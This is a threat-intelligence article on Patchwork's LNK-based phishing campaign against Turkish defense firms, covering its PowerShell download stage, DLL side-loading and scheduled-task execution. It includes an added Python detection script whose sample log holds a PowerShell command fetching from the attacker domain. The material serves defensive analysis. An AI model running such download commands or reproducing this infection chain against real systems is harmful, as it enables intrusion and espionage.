Patchwork APT Targets Turkey’s Defense Sector: Indian Cyber-Espionage Group Seeks Hypersonic & UAV Secrets
The threat group known as Patchwork—also operating under aliases such as APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson—has launched a new targeted phishing campaign aimed at Turkey’s defense sector. According to analysts, the primary objective of the attackers is to obtain sensitive information related to the development of unmanned platforms and hypersonic weaponry.
According to Arctic Wolf Labs, the malicious infection chain consists of five stages and begins with the distribution of Windows LNK shortcut files disguised as invitations to an international conference on unmanned systems. The phishing emails carrying these shortcuts were specifically addressed to personnel working within Turkey’s military-industrial complex, including a manufacturer of precision-guided missile systems.
The geopolitical backdrop lends this campaign particular weight: its timing coincides with deepening military-technical cooperation between Turkey and Pakistan, as well as escalating tensions between Pakistan and India. Analysts note that Patchwork is believed to operate in the interest of the Indian state and has, since 2009, systematically targeted political and military entities across South Asia.
At the beginning of 2025, the same group conducted a campaign against Chinese universities, using documents related to the energy sector as bait. That operation employed a loader written in Rust, which decrypted and executed a C# trojan known as Protego, designed for data exfiltration from infected machines.
In the current attack against Turkish defense institutions, Patchwork again employs LNK files embedded with PowerShell commands. These scripts initiate a connection to a remote server at expouav[.]org—a domain registered on June 25, 2025—which serves as the delivery point for the malicious payload. In addition to the malware, the site hosts a PDF document masquerading as material from a legitimate international conference, ostensibly referencing a real event hosted on the WASET platform. This visual decoy helps distract the user while malicious scripts execute in the background.
Subsequent stages involve the download of a DLL library, which is executed via DLL side-loading—replacing a legitimate component within a trusted process. Execution is triggered by a scheduled task within the Windows Task Scheduler that launches embedded shellcode. This module performs reconnaissance, gathering system metadata, capturing screen images, and transmitting the data to a command-and-control server.
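The chain described above (LNK-launched PowerShell reaching the staging domain, a side-loaded DLL, a scheduled task as the execution trigger) lends itself to stage-based correlation on endpoint telemetry. The following is an added detection example, not code from Arctic Wolf Labs or from the report; the JSON event schema, hostnames and file paths are constructed, and only the domain comes from the article.

```python
import json
from collections import defaultdict

# The domain is the one quoted in the report (defanged there as expouav[.]org);
# field names, hosts and paths below are constructed for this example.
C2_DOMAINS = {"expouav.org"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\")

def normalize(value):
    return str(value).lower().replace("[.]", ".")

def classify(event):
    """Map one endpoint event to a stage of the reported chain, or None."""
    parent, image = normalize(event.get("parent", "")), normalize(event.get("image", ""))
    cmd, dll = normalize(event.get("cmd", "")), normalize(event.get("loaded_dll", ""))
    # Stage 1: Explorer (an opened LNK) spawns PowerShell that reaches the staging domain.
    if parent.endswith("explorer.exe") and image.endswith("powershell.exe") \
            and any(d in cmd for d in C2_DOMAINS):
        return "lnk_powershell_download"
    # Stage 2: side-loading pattern - a DLL in a user-writable directory is loaded
    # by a binary that lives somewhere else (same-directory loads stay unflagged).
    if dll and any(p in dll for p in USER_WRITABLE) \
            and dll.rsplit("\\", 1)[0] != image.rsplit("\\", 1)[0]:
        return "dll_sideload"
    # Stage 3: a scheduled task is created, the execution trigger the report describes.
    if image.endswith("schtasks.exe") and "/create" in cmd:
        return "scheduled_task"
    return None

def correlate(lines):
    """Return hosts on which two or more distinct stages were observed, in order seen."""
    seen = defaultdict(list)
    for line in lines:
        event = json.loads(line)
        stage = classify(event)
        if stage and stage not in seen[event["host"]]:
            seen[event["host"]].append(stage)
    return {host: stages for host, stages in seen.items() if len(stages) >= 2}

# Constructed sample log (one JSON event per line); ws2 and ws3 are benign look-alikes.
SAMPLE_LOG = [
    r'{"host":"ws1","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell -c iwr http://expouav[.]org/conf"}',
    r'{"host":"ws1","image":"C:\\Program Files\\Vendor\\app.exe","loaded_dll":"C:\\Users\\u\\AppData\\Roaming\\Vendor\\helper.dll"}',
    r'{"host":"ws1","parent":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","image":"C:\\Windows\\System32\\schtasks.exe","cmd":"schtasks /create /tn ConfUpdate /tr C:\\Users\\u\\AppData\\Roaming\\Vendor\\app.exe"}',
    r'{"host":"ws2","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell Get-ChildItem"}',
    r'{"host":"ws2","image":"C:\\Windows\\System32\\schtasks.exe","cmd":"schtasks /create /tn Backup /tr backup.exe"}',
    r'{"host":"ws3","image":"C:\\Users\\u\\AppData\\Local\\Vendor\\update.exe","loaded_dll":"C:\\Users\\u\\AppData\\Local\\Vendor\\libcurl.dll"}',
]
```

Running `correlate(SAMPLE_LOG)` flags only ws1 with all three stages; a lone scheduled task (ws2) or a DLL loaded from its own directory (ws3) stays below the threshold, which keeps the rule focused on the chain rather than on any single common event.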
A distinguishing feature of the latest operations is the use of 32-bit PE files in place of the 64-bit DLLs previously observed. This shift indicates an evolution of the group’s technical infrastructure and an effort to enhance stealth: compact x86 binaries are more easily embedded within trusted processes, and the change in architecture complicates automated threat detection.
Researchers also identified infrastructure overlaps between Patchwork and elements previously associated with the DoNot Team (APT-Q-38, Bellyworm), suggesting possible tactical or logistical coordination between the two Indian APT clusters.
This campaign targeting Turkey’s defense sector marks a significant expansion of Patchwork’s operational theater, which had previously focused primarily on South Asia. Given Turkey’s pivotal role in the global UAV market—accounting for roughly 65% of worldwide exports—and its ambitions to advance hypersonic weapons development, the activity of this Indian cyber-espionage group appears to be strategically driven.